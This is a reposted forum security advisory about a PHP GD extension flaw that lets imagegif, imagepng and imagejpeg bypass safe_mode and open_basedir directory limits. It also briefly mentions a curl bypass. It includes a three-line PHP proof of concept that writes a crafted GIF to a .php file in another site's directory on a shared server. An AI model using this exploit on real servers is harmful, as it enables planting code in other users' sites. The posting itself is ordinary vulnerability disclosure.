[转载]PHP本地安全目录限制绕过漏洞以及测试代码
信息来源:slythers (at) gmail (dot) comThere is a vulnerability (local safedir restriction bypass) identified within the GD extension affecting
the following functions:
- imagegif()
- imagepng()
- imagejpeg()
in /ext/gd/gd.c line 1647
Which is now fixed in the cvs
[url]http://cvs.php.net/co.php/php-src/ext/gd/gd.c?r=1.312.2.1#1786[/url]
POC:
with an image like [url]http://81.57.125.106/~slythers/file.gif[/url]
<?php
$im = imagecreatefromgif("file.gif");
imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php');
?>
curl openbasedir and safemode bypass.
POC:
[url]http://www.eviloctal.com/forum/read.php?fid=22&tid=15607&toread=1[/url]
As you notice, we can bypass the safedir which leads to access to any
files on any shared servers.
This is fixed in the cvs.
slythers (at) gmail (dot) com [email concealed]
greets : david coallier <davidc (at) php (dot) net [email concealed]>
页:
[1]